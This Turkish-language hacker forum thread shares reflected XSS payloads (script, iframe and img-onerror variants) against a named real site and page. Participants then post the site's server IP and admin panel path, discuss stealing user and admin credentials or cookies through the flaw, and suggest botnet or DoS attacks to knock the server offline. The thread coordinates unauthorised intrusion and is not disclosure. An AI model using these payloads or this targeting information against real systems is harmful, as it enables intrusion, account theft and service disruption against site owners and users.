Türk Hacker Sitesi XSS (turkz.org) (8 Viewers)

[Metafor]

Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar.

 

[Axis]

Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam

 

[Metafor]

Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam

Bu sitede pek önemli değil ama biraz uğraşırsan kullanıcı bilgilerini çalabilirsin. Ya da admin paneli bulursan admin bilgilerini de çalman mümkün.
XSS bir zayıflık işaretidir...

 

[Metafor]

Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam

Buyur dostum XSS dersleri:

Reflected XSS (Low level)
Reflected XSS (Medium level)
Reflected XSS (High level)

Stored XSS (Low level)
Stored XSS (Medium level)

 

[TheKoswog]

Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar.

Reis bu sitenin tasarımını çalabilirsen dile benden ne dilersen.

 

[Nobody]

boş

 

[Metafor]

boş

Neden

 

[Nobody]

programla taratıp atma buraya kardeşim işe yaramaz

 

[Metafor]

programla taratıp atma buraya kardeşim işe yaramaz

Siz nası buluyonuz

 

[Metafor]

programla taratıp atma buraya kardeşim işe yaramaz

Kardeş siz nasıl açık buluyosunuz?

 

[Silinen üye 7909]

Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar.

o siteye üye olmaya çalıştımda hata verdi eğer üye olduysan bana üyelikten sonraki maili gönderir misni kardeşim [email protected]

 

[Metafor]

o siteye üye olmaya çalıştımda hata verdi eğer üye olduysan bana üyelikten sonraki maili gönderir misni kardeşim [email protected]

Bana da mail gelmemişti galiba. Neden üye olmak istiyorsun?

 

[Metafor]

programla taratıp atma buraya kardeşim işe yaramaz

Hocam tamam belki dandik konu ama soruma cevap vermedim. Bekliyorum hala.

 

[S4tyric0n]

güldürdün vallahi beni.
şutladım.

 

[Metafor]

o siteye üye olmaya çalıştımda hata verdi eğer üye olduysan bana üyelikten sonraki maili gönderir misni kardeşim [email protected]

Ben demin kayıt oldum ama açıklamaya "Açığınızı buldum ağzunuza kürek sokacam." yazdığım için banlanmışım. Öyle diyor.

 

[Silinen üye 7909]

Ben demin kayıt oldum ama açıklamaya "Açığınızı buldum ağzunuza kürek sokacam." yazdığım için banlanmışım. Öyle diyor.

kayıt olduktan sonra gelen maili bana gönderir misin kardeşim.

 

[Metafor]

kayıt olduktan sonra gelen maili bana gönderir misin kardeşim.

Elle onaylıyor. Ondan sonra maile bizim forum böyle bizim forum şöyle diye bir yazı geliyor.
GÖNDERDİM

 

[asdasd123]

Portalı çok incelemedim ama xenforo ile bağlantısı varsa bı cookie çeksen sipahiler horror Story

 

[Silinen üye 7909]

Bu konu altında boş yorum atmayalım ;
Sunucu ipsi : http://ip51.ip-178-33-220.eu / 178.33.220.51

Admin yolu : http://www.turkz.org/Forum/auth.php

Pentestçi arkadaşları davet ediyorum ben bakmaya devam edeceğim. Gelişme olursa yorum ata ata bildirelim birbirimizi

 

[Nobody]

açığın kokusu burnumuza geliyor kardeşim D @Mectruy

 

[asdasd123]

Sunucudan birşey yapamazsınız admin panelde boş eve gidene kadar xss kapatmazlarsa ben göstericem xss den ne yapılıyor ( hiçbir türlü bir düşmanlığim yok hatta türk sitesi olduğu için Boran önce açığı kapatsın sipahiler gibi bir grupta saçmalık bu )

 

[Silinen üye 7909]

Sunucudan birşey yapamazsınız admin panelde boş eve gidene kadar xss kapatmazlarsa ben göstericem xss den ne yapılıyor ( hiçbir türlü bir düşmanlığim yok hatta türk sitesi olduğu için Boran önce açığı kapatsın sipahiler gibi bir grupta saçmalık bu )

Site cloud kullanıyor, IP botnet yada dosçular için saldırarak sunucuyu offline moduna sokabilrisin. Admin panel muhabbetine gelirsekte araştırmadım fakat muhakkak bir kaç exploit vardır xenforo'Nun burası için müsait olunca araştırıcam zaten

 

[veyiez]

Eline Sağlık